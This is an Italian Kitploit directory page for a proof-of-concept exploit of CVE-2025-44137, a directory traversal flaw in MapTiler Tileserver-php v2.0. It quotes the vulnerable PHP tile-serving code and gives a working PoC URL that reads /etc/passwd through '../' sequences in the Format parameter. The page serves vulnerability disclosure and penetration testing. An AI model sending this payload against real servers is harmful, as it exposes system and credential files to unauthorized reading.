Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-44137 — Exploit proof-of-concept per CVE-2025-44137: directory traversal non autenticata in MapTiler Tileserver-php v2.0, che consente la lettura arbitraria di file tramite parametri GET modificati. | Kitploit
Strumenti/GitHubGitHub/mheranco/cve-2025-44137
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmheranco/cve-2025-44137

CVE-2025-44137

Exploit proof-of-concept per CVE-2025-44137: directory traversal non autenticata in MapTiler Tileserver-php v2.0, che consente la lettura arbitraria di file tramite parametri GET modificati.

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-44137

Lettura di file non autenticata in MapTiler Tileserver-php v2.0.

Descrizione

MapTiler Tileserver-php v2.0 è vulnerabile a Directory Traversal. La funzione renderTile all'interno di tileserver.php è responsabile della consegna delle tile memorizzate come file sul server tramite richiesta web. Creando il percorso di un file è possibile utilizzare '../', che può essere usato per leggere qualsiasi file sul server web. I parametri GET interessati sono "TileMatrix", "TileRow", "TileCol" e "Format"

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L381-L398

root@kitploit:~
      $name = './' . $tileset . '/' . $z . '/' . $x . '/' . $y;
      $mime = 'image/';
      if($ext != null){
        $name .= '.' . $ext;
      }
      if ($fp = @fopen($name, 'rb')) {
        if($ext != null){
          $mime .= $ext;
        }else{
          //detect image type from file
          $mimetypes = ['gif', 'jpeg', 'png'];
          $mime .= $mimetypes[exif_imagetype($name) - 1];
        }
        header('Access-Control-Allow-Origin: *');
        header('Content-Type: ' . $mime);
        header('Content-Length: ' . filesize($name));
        fpassthru($fp);
        die;

PoC

http://localhost/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.

Schermata 1 Schermata 2

Crediti

Martin Herancourt

Scarica lo strumento